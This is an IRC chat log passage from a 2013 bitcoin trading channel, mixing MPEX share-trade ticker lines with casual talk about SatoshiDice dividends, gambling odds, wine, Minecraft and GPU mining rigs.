1.4453 BTC [+] Jan 01 19:48:14 [MPEX] [S.MPOE] 7410 @ 0.00063179 = 4.6816 BTC [-] Jan 01 19:48:15 [MPEX] [S.MPOE] 8776 @ 0.00063111 = 5.5386 BTC [-] Jan 01 19:52:51 S.DICE has a lot of volume in 24 hours Jan 01 19:52:55 !ticker S.DICE Jan 01 19:52:56 [MPEX:S.DICE] 1day: 0.00350619 / 0.00358712 / 0.0036969 (82273 shares, 295.12 BTC), 30day: 0.0014 / 0.00327409 / 0.0037 (12791382 shares, 41,880.26 BTC) Jan 01 19:53:08 !ticker S.MPOE Jan 01 19:53:10 [MPEX:S.MPOE] 1day: 0.00063111 / 0.00064982 / 0.00066 (384747 shares, 250.02 BTC), 30day: 0.00050368 / 0.00058449 / 0.00066 (69672257 shares, 40,723.17 BTC) Jan 01 19:53:19 well I'll be damned Jan 01 19:54:11 [MPEX] [S.DICE] 1526 @ 0.00353244 = 5.3905 BTC [-] Jan 01 19:54:12 [MPEX] [S.DICE] 1887 @ 0.00350619 = 6.6162 BTC [-] Jan 01 19:56:44 [MPEX] [S.MPOE] 3628 @ 0.00063292 = 2.2962 BTC [+] Jan 01 20:08:36 hi all Jan 01 20:15:47 hi jurov Jan 01 20:15:53 happy new year -assets :) Jan 01 20:18:25 smickles lol what do you mean recruites Jan 01 20:20:04 hny mod6 Jan 01 20:20:17 Heeeey! Jan 01 20:21:18 didja have a good New Years? Jan 01 20:22:08 I flew an RC plane Jan 01 20:23:06 pretty good yea Jan 01 20:23:25 i was on mountain retreat Jan 01 20:23:28 i'm going to create a drone army of rc planes Jan 01 20:23:33 and take over detroit Jan 01 20:23:35 haha Jan 01 20:23:48 what guns should I use mircea_popescu Jan 01 20:23:59 or should I just drop bomps on them? Jan 01 20:24:02 thestringpuller, use laz0rs Jan 01 20:24:07 WOOOT Jan 01 20:24:27 i can be jr. obama Jan 01 20:24:39 drop dollars. Jan 01 20:24:44 haha Jan 01 20:25:10 lmao yesterday someone bought like 10k or so ditm puts Jan 01 20:25:11 the city would riot like gotham lol Jan 01 20:25:11 mircea's gonna provide ammo? Jan 01 20:25:15 next day, btc goes down Jan 01 20:25:34 insider trading? Jan 01 20:26:41 sounds like some arbitrage perhaps Jan 01 20:26:48 buy some puts, sell the market Jan 01 20:27:29 ? Jan 01 20:27:32 *shrug* Jan 01 20:29:19 mircea_popescu: they haven't sold them back yet tho Jan 01 20:30:15 true Jan 01 20:30:24 they are probaby working on ewt or simple techincal indicators, as i mentioned earlier some key spots happened today, they were pretty obviously comming tho Jan 01 20:31:07 neato Jan 01 21:31:44 [MPEX] [S.MPOE] 8700 @ 0.00064196 = 5.5851 BTC [+] Jan 01 21:33:53 ;;ticker Jan 01 21:33:54 BTCUSD ticker | Best bid: 13.25400, Best ask: 13.28595, Bid-ask spread: 0.03195, Last trade: 13.25001, 24 hour volume: 28492.72287578, 24 hour low: 13.16123, 24 hour high: 13.56100, 24 hour vwap: 13.36504 Jan 01 21:50:11 [MPEX] [S.DICE] 1850 @ 0.00350619 = 6.4865 BTC [-] Jan 01 21:50:54 for my curiosity, you folks ever ghad red champagne ? Jan 01 21:50:59 im on my third bottle. Jan 01 21:52:01 I've never even heard about it. Jan 01 21:52:25 i had that before Jan 01 21:55:22 it's pretty good. Jan 01 21:55:56 http://magazin.ccb95.ro/product.php?id_product=418 this specifically Jan 01 21:56:10 (well, i didn't buy it from w/e that site is, but it's the brand/item) Jan 01 22:03:24 I haven't had it either. I've just had champagne + chambord, thats as close as I've ever gotten. haha. Jan 01 22:04:03 i don't really go for champagne cocktails Jan 01 22:04:03 I havent had an alcoholic beverage for years now i think Jan 01 22:04:21 kakobrekla no wonder nobody wishes you gl in 2013 then :D Jan 01 22:04:23 yeah, they were handing them out some years ago on NYE at a bar in phoenix Jan 01 22:04:31 i don't drink at all anymore basically. Jan 01 22:04:42 mircea_popescu i was reffering to emails only Jan 01 22:04:42 i had 1 beer last year at the state fair :D Jan 01 22:04:55 why not tho ? alcohol is fun Jan 01 22:05:59 eh, im not sure. too old I suppose haha Jan 01 22:06:06 just doesn't agree with me anymore. Jan 01 22:06:10 yeah, it _was_ fun. Jan 01 22:06:18 'fun'. Jan 01 22:06:32 a well. moar for mwe Jan 01 22:06:41 http://www.ilikecheats.com/forums/attachment.php?attachmentid=381&d=1341874373 Jan 01 22:07:07 ahahaha Jan 01 22:09:38 My uncle was making excellent wines. He went out of business tho and back to some computer related job. Jan 01 22:11:30 europe sits on a lake of wine Jan 01 22:11:46 its practically free by now Jan 01 22:11:52 they're paying people not to make more Jan 01 22:12:32 this of course just means the dry idiots are ruining the business, and in a century or two people will all drink piss Jan 01 22:12:33 aka beer Jan 01 22:13:47 [MPEX] [S.DICE] 1883 @ 0.00354949 = 6.6837 BTC [+] Jan 01 22:14:17 [MPEX] [S.DICE] 1569 @ 0.00361322 = 5.6691 BTC [+] Jan 01 22:14:17 [MPEX] [S.DICE] 688 @ 0.0036272 = 2.4955 BTC [+] Jan 01 22:14:17 [MPEX] [S.DICE] 660 @ 0.00362951 = 2.3955 BTC [+] Jan 01 22:15:22 it's hygenic Jan 01 22:16:39 no it's not. Jan 01 22:16:43 its coke differenlt flavoured Jan 01 22:19:03 beer? hygienic? wtf? Jan 01 22:19:33 yea i had rose champagne, it's normal thing here Jan 01 22:21:05 imho only people who never got drunk on good wine can always prefer beer. Jan 01 22:21:20 wine drunk = euphoria. beer drunk = shit. Jan 01 22:21:33 jurov not rose tho Jan 01 22:21:35 red. Jan 01 22:21:45 literally, red, dark. Jan 01 22:22:08 dark red? yes, that's novelty Jan 01 22:22:17 [MPEX] [S.MPOE] 4265 @ 0.00064162 = 2.7365 BTC [-] Jan 01 22:22:19 [MPEX] [S.MPOE] 8393 @ 0.00063111 = 5.2969 BTC [-] Jan 01 22:22:20 [MPEX] [S.MPOE] 1442 @ 0.00063008 = 0.9086 BTC [-] Jan 01 22:22:24 as dark as a girl from chad Jan 01 22:22:45 literally, ion that pic on that site i linked, the bottle is clear. Jan 01 22:22:51 the liquid provides the color. Jan 01 22:22:59 people who drink their piss claim its hygenic Jan 01 22:23:07 bucha pussies, bang+schnapps=mind blown Jan 01 22:23:41 okay. closest to that i had only some blackcurrant wine with bubbles Jan 01 22:27:25 maybe best wine i ever had was elderberry+white plums mix made by my brother Jan 01 22:27:38 that's not wine tho Jan 01 22:28:41 and what would be that? apple wine is. currant wine is. Jan 01 22:30:45 I once cultured some yeast off of concord grapes, then used that to make wine out of the same sort of grapes. It gave a plesant time :) Jan 01 22:32:04 nah,. wine is grape only Jan 01 22:32:09 i guess it'd liquor or something Jan 01 22:38:58 whatever. i should be sorting the mpoe dividend mess, it keeps biting me Jan 01 22:39:02 instead Jan 01 22:40:01 ;;calc 1425.29917774/500000000 Jan 01 22:40:02 2.85059835548e-06 Jan 01 22:40:37 that's 0.00000285 BTC/share Jan 01 22:40:50 why does my code think it's 10x more? Jan 01 22:45:57 ghost in the shell Jan 01 22:49:13 no, it was caused by mircea's mistake that was immediately retconned Jan 01 22:54:16 retcon ftw Jan 01 22:55:16 after i hastily fixed it up it ended up here with correct result but with humongous "rounding error" corrections Jan 01 23:00:08 jurov: that mpoe short would've worked out well for you Jan 01 23:03:13 sry, random, but I was just looking at what it potentially could've been Jan 01 23:03:59 smickles i discovered minecraft Jan 01 23:04:11 lol, you know, i run a small tekkit server Jan 01 23:04:23 i'm both ahead of and behind the curve as far as what is cool Jan 01 23:04:35 i played for 3 days sleepless Jan 01 23:04:46 how do i build traps i need gunpowder! Jan 01 23:04:52 I know how Jan 01 23:04:57 gah Jan 01 23:05:18 move them with water into a 'lava blade' is one way Jan 01 23:05:22 i'm really caught up with water and lava contraptions Jan 01 23:05:27 yes Jan 01 23:05:34 try/working on that Jan 01 23:05:47 you should just be able to make stacks of those Jan 01 23:06:07 or, you could get really fancy and efficient with redstone Jan 01 23:06:19 redstone is where i'm heading Jan 01 23:06:29 like 500 redstone in chests unused Jan 01 23:06:31 find a creeper spawner, they're rare Jan 01 23:06:46 i've mostlydug out huge underground wonders Jan 01 23:06:48 heh, if you get into redstone, 500 is a tiny amount Jan 01 23:08:18 I made a game where the players hit buttons to send a wave of wool blocks, in various lanes, across to their opponent to knock them off Jan 01 23:08:21 quite fun Jan 01 23:09:45 interesting Jan 01 23:10:02 i'm still understanding what all is possible Jan 01 23:10:52 i once saw a working example of a simplified version of minecraft in minecraft, so I imagine a great many things are possibel Jan 01 23:14:35 [MPEX] [S.DICE] 1522 @ 0.00350619 = 5.3364 BTC [-] Jan 01 23:14:36 [MPEX] [S.DICE] 578 @ 0.00350267 = 2.0245 BTC [-] Jan 01 23:54:18 Currently for sale: Jan 01 23:54:18 256 JAH shares (relisted on BitFunder) Jan 01 23:54:18 178 PUREMINING shares Jan 01 23:54:18 200 FPGA.CONTRACT shares Jan 01 23:54:18 9 CPA shares (relisted on BTCT.CO) Jan 01 23:54:19 If you are intrested in buying shares please PM me with your offer. Jan 01 23:55:13 half a coin. Jan 01 23:55:24 mebbe. Jan 01 23:55:26 uhmmmn, anyone else? Jan 01 23:56:01 30 BTC for all Jan 02 00:01:09 ill pay a whole coin just to give smickles the headache of liquidating all that. Jan 02 00:01:47 hehe Jan 02 00:02:23 I got the headache now Jan 02 00:02:43 I want to close down FDBF but at this rate it will take my whole life Jan 02 00:04:44 Well Jan 02 00:05:18 This is encouraging Jan 02 00:05:19 https://bitcointalk.org/index.php?topic=80312.msg1429464#msg1429464 Jan 02 00:09:42 S.DICE is up 10,000 BTC in the first day of the new year Jan 02 00:09:43 lol Jan 02 00:17:15 no ?! Jan 02 00:17:30 how far can this go ?! Jan 02 00:18:45 Final SD Profit: 43115.08527065 Jan 02 00:18:49 am i misreading this ? seems about even Jan 02 00:23:31 it was 33000 yesterday Jan 02 00:23:42 up 10k today Jan 02 00:23:50 how has this not sold out yet? Jan 02 00:28:27 [MPEX] [S.DICE] 2100 @ 0.00350267 = 7.3556 BTC [-] Jan 02 00:30:18 ;;ticker Jan 02 00:30:19 BTCUSD ticker | Best bid: 13.26000, Best ask: 13.34000, Bid-ask spread: 0.08000, Last trade: 13.25551, 24 hour volume: 29045.23424401, 24 hour low: 13.16123, 24 hour high: 13.56100, 24 hour vwap: 13.34483 Jan 02 00:32:56 i guess there's a delay. Jan 02 00:34:33 < mircea_popescu> ill pay a whole coin just to give smickles the headache of liquidating all that <<< i've been charging .75btc/hr for that service Jan 02 00:35:00 to whom ? Jan 02 00:40:46 mircea_popescu: Are you asking me to reveal the identity of my clients? Jan 02 00:41:14 I don't think I've discussed that sort of thing with many of them, so I'll refrain from doing that Jan 02 00:41:14 lol ok Jan 02 00:41:30 i was just fishin Jan 02 00:41:40 how about this: Jan 02 00:42:14 anyone who I've done 'liquidation work' for, mircea_popescu want's to know you, in that way. speak up if you want to. Jan 02 00:43:21 this way i can pay PsychoticBoy 1 btc to give the assets to those people so they can liquitate them using smickle's services Jan 02 00:43:26 we're creating jobs here Jan 02 00:43:28 i'm obama. Jan 02 00:45:44 I like the blog post. Strange convergence. I know rassah IRL from way back. Many parties were had Jan 02 00:46:38 [MPEX] [S.MPOE] 600 @ 0.00064196 = 0.3852 BTC [+] Jan 02 00:46:40 [MPEX] [S.MPOE] 1500 @ 0.00064448 = 0.9667 BTC [+] Jan 02 00:49:50 o srsly ? Jan 02 00:50:05 pretty sure Jan 02 00:50:06 i always suspected rassah = pretty hawt chick. is this a fact ? Jan 02 00:50:17 lol Jan 02 00:50:37 nope Jan 02 00:50:52 aww. i guess my hawtchickometer is teh borkt. Jan 02 00:52:07 [MPEX] [S.DICE] 4185 @ 0.00350267 = 14.6587 BTC [-] Jan 02 00:53:16 looks like the trading bots have started playing around on S.DICE Jan 02 00:55:13 well, rassah is one of teh rota judges. Jan 02 00:56:52 he is one of my all time favorite people Jan 02 01:01:10 cool! Jan 02 01:01:18 so get him to come here lol Jan 02 01:03:58 the perfect addition to any party Jan 02 01:04:26 How do you get a dancefloor started? Jan 02 01:04:43 At a burning man event? Jan 02 01:05:10 [MPEX] [S.MPOE] 1208 @ 0.00063008 = 0.7611 BTC [-] Jan 02 01:05:10 [MPEX] [S.MPOE] 3192 @ 0.00062926 = 2.0086 BTC [-] Jan 02 01:05:21 Take a bunch of streamers and run circles around everyone who passes by until the dancefloor is packed Jan 02 01:14:16 lol Jan 02 01:33:36 evoorhees: welcome :) Jan 02 01:33:43 heya Jan 02 01:33:52 [MPEX] [S.MPOE] 4300 @ 0.00063572 = 2.7336 BTC [+] Jan 02 01:36:59 o, the man of the hour Jan 02 01:37:31 un oh Jan 02 01:37:34 uh oh Jan 02 01:38:05 lol that sounds classic. Jan 02 01:38:16 weeee Jan 02 01:38:39 i'm only up 1500 btc on the site.... Jan 02 01:40:34 o, you can win playing ? Jan 02 01:40:49 gigavps: uesed to be on the big winner list Jan 02 01:40:51 so he says Jan 02 01:40:56 *used Jan 02 01:45:07 gigavps you and gowest are on my enemies list ;) Jan 02 01:45:14 he made like 2000 off me recently Jan 02 01:45:45 lol why take it so personal ? Jan 02 01:45:56 big winners are a casino's best friend. they give everyone else hopes. Jan 02 01:46:03 you should buy them free dices and whatnot. Jan 02 01:46:21 i only play when i'm drunk and happy Jan 02 01:46:40 heh, win >1kbtc, get a free pair of loaded SD branded dice Jan 02 01:46:50 the dude betting 250 on 18% blew me off the leader board Jan 02 01:47:01 fucker Jan 02 01:47:04 srsly, there should be sdice merchandising Jan 02 01:47:13 like, a large dice with >1200 > 1800 etc on the sides Jan 02 01:47:37 like an icosahedron or we Jan 02 01:49:37 evoorhees: can i license the brand to sell dice? Jan 02 01:49:47 good point mircea Jan 02 01:50:28 smickles - if you're serious I'd love to make that happen, send me an email if so Jan 02 01:50:34 erikvoorhees@gmail Jan 02 01:50:47 [MPEX] [S.DICE] 255 @ 0.00351468 = 0.8962 BTC [+] Jan 02 01:50:58 [MPEX] [S.DICE] 1000 @ 0.00351468 = 3.5147 BTC [+] Jan 02 01:51:09 [MPEX] [S.DICE] 1150 @ 0.00351468 = 4.0419 BTC [+] Jan 02 01:51:29 S.DICE dividend is going out in a matter of minutes fyi Jan 02 01:51:44 evoorhees: you run sdice? Jan 02 01:51:54 I have a hand in it, yes Jan 02 01:52:38 very cool Jan 02 01:52:45 It's pretty popular these days, no? Jan 02 01:52:46 [MPEX] [S.DICE] 145 @ 0.00351468 = 0.5096 BTC [+] Jan 02 01:53:02 lol last minute s.dice buy Jan 02 01:53:40 leenak yeah it's been pretty popular since May, but last two months has picked up further Jan 02 01:54:09 [MPEX] [S.DICE] 318 @ 0.00351487 = 1.1177 BTC [+] Jan 02 01:54:51 [MPEX] [S.DICE] 682 @ 0.00351487 = 2.3971 BTC [+] Jan 02 01:54:53 [MPEX] [S.DICE] 1150 @ 0.00351538 = 4.0427 BTC [+] Jan 02 01:54:54 [MPEX] [S.DICE] 2777 @ 0.0035377 = 9.8242 BTC [+] Jan 02 01:54:55 [MPEX] [S.DICE] 1647 @ 0.00362951 = 5.9778 BTC [+] Jan 02 01:54:56 [MPEX] [S.DICE] 1500 @ 0.00363509 = 5.4526 BTC [+] Jan 02 01:54:57 [MPEX] [S.DICE] 4244 @ 0.00363721 = 15.4363 BTC [+] Jan 02 01:55:30 [MPEX] [S.DICE] 1456 @ 0.00363721 = 5.2958 BTC [+] Jan 02 01:55:31 [MPEX] [S.DICE] 1650 @ 0.00364582 = 6.0156 BTC [+] Jan 02 01:55:33 [MPEX] [S.DICE] 2100 @ 0.00364968 = 7.6643 BTC [+] Jan 02 01:55:34 [MPEX] [S.DICE] 1210 @ 0.00366141 = 4.4303 BTC [+] Jan 02 01:55:35 [MPEX] [S.DICE] 1603 @ 0.00367283 = 5.8875 BTC [+] Jan 02 01:55:36 [MPEX] [S.DICE] 2200 @ 0.00368216 = 8.1008 BTC [+] Jan 02 01:55:37 [MPEX] [S.DICE] 1700 @ 0.0036855 = 6.2654 BTC [+] Jan 02 01:55:38 [MPEX] [S.DICE] 3081 @ 0.0037 = 11.3997 BTC [+] Jan 02 01:56:29 lol who waited this long to buy it? Jan 02 01:56:43 haha, *shrug* someone wanted MOAR though Jan 02 01:59:10 !ticker S.DICE Jan 02 01:59:11 [MPEX:S.DICE] 1day: 0.00350267 / 0.00358702 / 0.0037 (89122 shares, 319.68 BTC), 30day: 0.0014 / 0.00327514 / 0.0037 (12775543 shares, 41,841.76 BTC) Jan 02 01:59:58 i guess a gambler... Jan 02 02:00:05 damn. I was going to buy more S.DICE Jan 02 02:00:09 at .0035 Jan 02 02:00:15 guess I missed the op Jan 02 02:01:04 evoorhees just announced div imminent and some buys happened Jan 02 02:01:23 or to quote, lol who waited this long to buy it? Jan 02 02:01:27 i wus eating dinner Jan 02 02:04:53 [MPEX] [S.DICE] [PAID] 10000000 @ 0.0000001 = 1 BTC Jan 02 02:05:21 shit Jan 02 02:05:23 too slpw Jan 02 02:06:43 dividend paid! Jan 02 02:06:46 lol 1 btc teh shizzil Jan 02 02:06:56 1,720 btc Jan 02 02:06:58 mr. voorhees himself Jan 02 02:07:08 17206.4488847 total ftr. Jan 02 02:07:21 mircea is that a bug? Jan 02 02:07:25 evoorhees assbot is borkt, getting fixed soon. Jan 02 02:07:31 k Jan 02 02:07:40 gets confuzeled reading divs Jan 02 02:07:58 Happy new year shareholders ;) Jan 02 02:07:59 is no bug mp pays us 1 btc Jan 02 02:08:06 though life Jan 02 02:08:11 Thanks! Jan 02 02:08:13 I think that was about 5% yield in one month Jan 02 02:08:21 yeah Jan 02 02:08:23 !ticker s.dice Jan 02 02:08:26 [MPEX:S.DICE] 1day: 0.00350267 / 0.00358702 / 0.0037 (89122 shares, 319.68 BTC), 30day: 0.0014 / 0.00327514 / 0.0037 (12775543 shares, 41,841.76 BTC) Jan 02 02:08:38 ;;calc 17206.4488847/ 0.00327514 Jan 02 02:08:38 5253652.93841 Jan 02 02:08:40 Looking pretty good for this month too:) Jan 02 02:08:41 5.25% Jan 02 02:08:45 already up 10,000 Jan 02 02:08:52 daaamn Jan 02 02:08:55 bwah haha ha Jan 02 02:09:01 go go gadget satoshi dice Jan 02 02:09:28 that +10,000 today should probably dampen any S.DICE dumps Jan 02 02:09:28 yeah that happened as I was going to sleep last night... was drunk from new years eve party so number looked all blurry on my phone, but when I woke up I discovered it was true Jan 02 02:09:38 lol Jan 02 02:09:48 Bugpowder i dun see any dumps. Jan 02 02:10:17 Man I was puming up S.DICE at some parties last night Jan 02 02:10:17 Another FTC lawyer was there Jan 02 02:10:23 She thought FTC would not move on boitcoins Jan 02 02:10:30 but another agency might Jan 02 02:11:23 ya, it's the consensus in washington atm : Jan 02 02:11:30 no agency will move on sdice but another one might Jan 02 02:11:30 FBI or tresaury Jan 02 02:11:34 lol Jan 02 02:11:37 as if it were a fucking bureaucracy or something Jan 02 02:11:42 people got other shit to worry about Jan 02 02:11:44 treasury thinks ss Jan 02 02:11:51 fbi has no resources, someone else shoudl do it Jan 02 02:11:56 exactly. Jan 02 02:12:01 terrorism Jan 02 02:12:03 how would they move on bitcoin in the states? Jan 02 02:12:08 buy some. Jan 02 02:12:15 that costs? Jan 02 02:12:32 SatoshiDice is not a US entity, is not hosted in the US, and does not use US currency Jan 02 02:13:01 evoorhees topic was bitcoin in general tho Jan 02 02:13:01 where are you hosted btw Jan 02 02:13:06 and in fact, it is impossible to stop US players from using it (since SD cannot prevent a payment to a bitcoin address)... so it'd be an interesting case Jan 02 02:13:15 hosted in Ireland Jan 02 02:13:24 which dc? Jan 02 02:13:29 why ireland ? just so it happened or any particular reason ? Jan 02 02:13:50 Ireland has reasonable legal leeway for online gambling Jan 02 02:14:01 but it was somewhat arbitrary... just needed to be outside the US Jan 02 02:16:53 Nice month for my bitcoin fund Jan 02 02:17:01 up 19.6% in BTC terms Jan 02 02:17:11 ;;ticker Jan 02 02:17:12 BTCUSD ticker | Best bid: 13.30413, Best ask: 13.35574, Bid-ask spread: 0.05161, Last trade: 13.30413, 24 hour volume: 28326.50349508, 24 hour low: 13.16123, 24 hour high: 13.56000, 24 hour vwap: 13.33695 Jan 02 02:17:27 incredibly stable Jan 02 02:17:33 i'd have expected some crazy swings with the halving Jan 02 02:17:39 but mum's the word. Jan 02 02:19:15 ASICs might destabilize it a bit Jan 02 02:19:27 [MPEX] [S.DICE] 517 @ 0.00350284 = 1.811 BTC [-] Jan 02 02:20:04 heh. asics ain't happening jus' yet. Jan 02 02:20:48 DUMPANG Jan 02 02:21:10 Hmmm Jan 02 02:21:18 time to put in a stink bid I think... Jan 02 02:24:11 anyone who want's to short, i have some to lend :) Jan 02 02:25:16 omg conspiraci. Jan 02 02:25:24 you know, it's actually this bad in euros these days. Jan 02 02:26:41 What did s.dice drop to last time? 14? Jan 02 02:28:07 well it sold that low, but it didn't last Jan 02 02:28:16 looks like 18 is the floor this time Jan 02 02:30:19 Bugpowder the 10k it's ahead this month tho... significant deviation from the expected value. it may drop some Jan 02 02:30:50 .py import time; time.time() Jan 02 02:31:00 oh, not this chan anymore ? :( Jan 02 02:31:08 it may Jan 02 02:31:15 but it is expected to keep going up Jan 02 02:31:18 :( Jan 02 02:31:19 :) Jan 02 02:31:24 just more slowly Jan 02 02:31:33 well, no, statistically it's expected to converge to ev Jan 02 02:31:38 no Jan 02 02:31:55 statistically its expected to continue to grow at ev Jan 02 02:32:00 from this baseline Jan 02 02:32:11 how does that work ?! Jan 02 02:32:23 what has happened Jan 02 02:32:26 has happened Jan 02 02:33:11 ya but it converges to ev over ALL time-space continuums Jan 02 02:34:18 evoorhees: is the balance on the sd app supposed to reflect that of the amount in the deposit address? Jan 02 02:34:42 all future bets converge to ev Jan 02 02:34:51 but we are over ev Jan 02 02:34:58 but shouldn't ev be busy with twitter? Jan 02 02:35:04 and that is independent Jan 02 02:35:07 any section of bets converge to ev, no matter how arbitrarily picked out of the timeline Jan 02 02:35:09 of any future bets Jan 02 02:35:46 the EV of this month is 10,000 + future bets *0.019 Jan 02 02:36:21 fuck this is actually true Jan 02 02:36:47 markedathome: yes, correct Jan 02 02:37:00 markedathome btw, you might be interested in http://trilema.com/2013/the-question-of-the-year-in-btc/ Jan 02 02:37:21 iirc you knew shit about the blockchain Jan 02 02:38:59 mircea_popescu: read it but slightly too late at night for me to make any effective ideas. Jan 02 02:39:07 not like there's any rush Jan 02 02:39:19 maybe pirate / slush-hack / bitcoinica-hack? Jan 02 02:39:35 ya someone was suggesting pirate as a main bettor Jan 02 02:39:44 tho tbh i doubht he ever walked away with that much coin Jan 02 02:39:53 maybe a rich gambling addict Jan 02 02:40:01 he walked away with the trollish satisfaction of having tricked a buncha people, sure. Jan 02 02:40:17 mircea_popescu: snorted it all accosrding to that chat log Jan 02 02:40:35 lol Jan 02 02:40:57 The story of veganhippie on seals for example Jan 02 02:41:10 i dun know that 1 Jan 02 02:42:08 evoorhees: the sd app is out of sync by about 0.05, possibly caused by a crash that happened that took out the machine (machine not the app), so don't know if app is misreading something somewhere Jan 02 02:42:19 Apparently (pre-seals) he got people to stake him $220,000 for a series of about 50 tourneys. After a few tourneys, he started gambling on the side with the money Jan 02 02:42:21 lost it all Jan 02 02:42:40 without playing in almost any tournies Jan 02 02:43:08 he is a very risky better on seals Jan 02 02:43:09 lol Jan 02 02:43:14 and big bankroll Jan 02 02:43:28 220k ? Jan 02 02:43:39 heh Jan 02 02:43:44 but anyway, sounds like typical gambling addict. Jan 02 02:43:45 I think he already lost it Jan 02 02:43:52 must have got more Jan 02 02:44:26 i knew a guy like that, his defining moment being when he spent one week geting together 50k to participate in a casino tournament Jan 02 02:44:30 got there half hour early Jan 02 02:44:33 lost it all in bj Jan 02 02:44:43 couldn't participate in tournament. Jan 02 02:44:43 eheh Jan 02 02:44:58 and the thing is... he was a great poker player, he was a worse bj player than most girls i know Jan 02 02:45:01 and he knew this Jan 02 02:45:07 but... half an hour. Jan 02 02:45:32 one of those can't do math but feels people through a closed door types. Jan 02 02:55:42 !ticker S.DICE Jan 02 02:55:44 [MPEX:S.DICE] 1day: 0.00350267 / 0.00358644 / 0.0037 (88939 shares, 318.97 BTC), 30day: 0.0014 / 0.00327513 / 0.0037 (12771137 shares, 41,827.18 BTC) Jan 02 03:15:32 [MPEX] [S.MPOE] 7727 @ 0.00063572 = 4.9122 BTC [+] Jan 02 03:32:00 [MPEX] [S.MPOE] 7100 @ 0.00063572 = 4.5136 BTC [+] Jan 02 03:41:43 [MPEX] [S.MPOE] 12500 @ 0.00064448 = 8.056 BTC [+] Jan 02 03:41:45 [MPEX] [S.MPOE] 3700 @ 0.00065 = 2.405 BTC [+] Jan 02 04:12:37 fuck Jan 02 04:12:44 S.DIEC Jan 02 04:13:02 only up 2k for the month now Jan 02 04:13:12 a string of good fortune Jan 02 04:13:14 for the whale Jan 02 04:24:31 lol Jan 02 04:24:39 i recall our little convo above re statistixc Jan 02 04:25:20 :> Jan 02 04:29:45 [MPEX] [S.DICE] 2648 @ 0.00355562 = 9.4153 BTC [+] Jan 02 04:29:47 [MPEX] [S.DICE] 1893 @ 0.00359775 = 6.8105 BTC [+] Jan 02 04:50:40 [MPEX] [S.DICE] 700 @ 0.00350284 = 2.452 BTC [-] Jan 02 05:06:01 [MPEX] [S.DICE] 1293 @ 0.00359775 = 4.6519 BTC [+] Jan 02 05:16:01 [MPEX] [S.DICE] 514 @ 0.00359775 = 1.8492 BTC [+] Jan 02 05:16:02 [MPEX] [S.DICE] 573 @ 0.00361924 = 2.0738 BTC [+] Jan 02 05:20:00 [MPEX] [S.DICE] 4100 @ 0.00361924 = 14.8389 BTC [+] Jan 02 05:30:23 [MPEX] [S.DICE] 1433 @ 0.00350284 = 5.0196 BTC [-] Jan 02 05:30:24 [MPEX] [S.DICE] 1494 @ 0.00350267 = 5.233 BTC [-] Jan 02 05:30:25 [MPEX] [S.DICE] 1773 @ 0.00349228 = 6.1918 BTC [-] Jan 02 05:40:40 [MPEX] [O.BTCUSD.C120T] 1 @ 0.11992171 BTC [-] Jan 02 05:40:42 [MPEX] [O.BTCUSD.P120T] 1 @ 0.01569055 BTC [-] Jan 02 05:48:39 [MPEX] [S.DICE] 4267 @ 0.00349766 = 14.9245 BTC [+] Jan 02 05:48:40 [MPEX] [S.DICE] 319 @ 0.00349228 = 1.114 BTC [-] Jan 02 05:48:42 [MPEX] [S.DICE] 814 @ 0.00348588 = 2.8375 BTC [-] Jan 02 06:10:22 nite Jan 02 07:00:43 [MPEX] [S.DICE] 10 @ 0.00356343 = 0.0356 BTC [+] Jan 02 07:01:05 [MPEX] [S.DICE] 80 @ 0.00356343 = 0.2851 BTC [+] Jan 02 07:51:04 [MPEX] [S.DICE] 2010 @ 0.00356343 = 7.1625 BTC [+] Jan 02 07:51:05 [MPEX] [S.DICE] 890 @ 0.00361221 = 3.2149 BTC [+] **** BEGIN LOGGING AT Wed Jan 2 16:43:28 2013 Jan 02 17:27:41 [MPEX] [S.DICE] 1053 @ 0.00359376 = 3.7842 BTC [-] Jan 02 17:27:41 [MPEX] [S.DICE] 1247 @ 0.00359126 = 4.4783 BTC [-] Jan 02 17:29:03 [MPEX] [S.DICE] 1920 @ 0.00364437 = 6.9972 BTC [+] Jan 02 17:29:03 [MPEX] [S.DICE] 2280 @ 0.00366038 = 8.3457 BTC [+] Jan 02 17:43:13 [MPEX] [S.MPOE] 3595 @ 0.00063292 = 2.2753 BTC [-] Jan 02 17:43:13 [MPEX] [S.MPOE] 12505 @ 0.00063408 = 7.9292 BTC [+] Jan 02 17:50:58 http://picostocks.com/ Jan 02 17:51:04 lol teh mpex style is win. Jan 02 17:51:16 where art thou ye bootstrap believers! Jan 02 17:52:06 [MPEX] [S.MPOE] 7228 @ 0.00062926 = 4.5483 BTC [-] Jan 02 17:52:07 [MPEX] [S.MPOE] 11527 @ 0.00062902 = 7.2507 BTC [-] Jan 02 17:52:08 [MPEX] [S.MPOE] 495 @ 0.00062874 = 0.3112 BTC [-] Jan 02 17:52:24 mpex style with 500 lines of css? Jan 02 17:52:31 how does taht work Jan 02 17:54:24 badly. Jan 02 17:57:50 [MPEX] [S.DICE] 4250 @ 0.00359126 = 15.2629 BTC [-] Jan 02 18:00:51 i like Jan 02 18:00:58 can i see moar of Jan 02 18:01:23 actually i don't see why people don't go full blast and declare e**-i font sizes Jan 02 18:01:39 that's what you have browsers for, no ? Jan 02 18:08:22 https://bitcointalk.org/index.php?topic=91173.msg1422891#msg1422891 Jan 02 18:08:29 so apparently asic has something delivered. Jan 02 18:11:09 [MPEX] [S.DICE] 3445 @ 0.00365486 = 12.591 BTC [+] Jan 02 18:15:15 [MPEX] [S.MPOE] 4850 @ 0.00062874 = 3.0494 BTC [-] Jan 02 18:20:19 i'm about to go rotate/replace gpus in the datacenter Jan 02 18:20:27 i hate it everytime i do that Jan 02 18:20:35 lol Jan 02 18:20:59 headless linux gpu mining rigs are particular Jan 02 18:21:08 especially once the ARDS MOVE AROUND Jan 02 18:21:45 it's going to end up beina a big pita for 700MH/s Jan 02 18:22:01 [MPEX] [S.DICE] 1505 @ 0.00365486 = 5.5006 BTC [+] Jan 02 18:22:02 [MPEX] [S.DICE] 220 @ 0.00366038 = 0.8053 BTC [+] Jan 02 18:22:03 [MPEX] [S.DICE] 1793 @ 0.0036707 = 6.5816 BTC [+] Jan 02 18:23:44 700 mh/s !? Jan 02 18:23:50 it already is a big pita for that. Jan 02 18:24:33 +700 MH/s off my hashrate Jan 02 18:24:44 i need to replace/rma one Jan 02 18:25:12 a Jan 02 18:25:17 but i'll probably end up having to rebuild one because of the weird mix of cards in the one rig Jan 02 18:25:31 like a 6970, 6950, and 7870 Jan 02 18:25:51 i have rigs i built that were the same components, and i have some that are like used junk cars Jan 02 18:25:57 this one is a used junk car Jan 02 18:44:10 [MPEX] 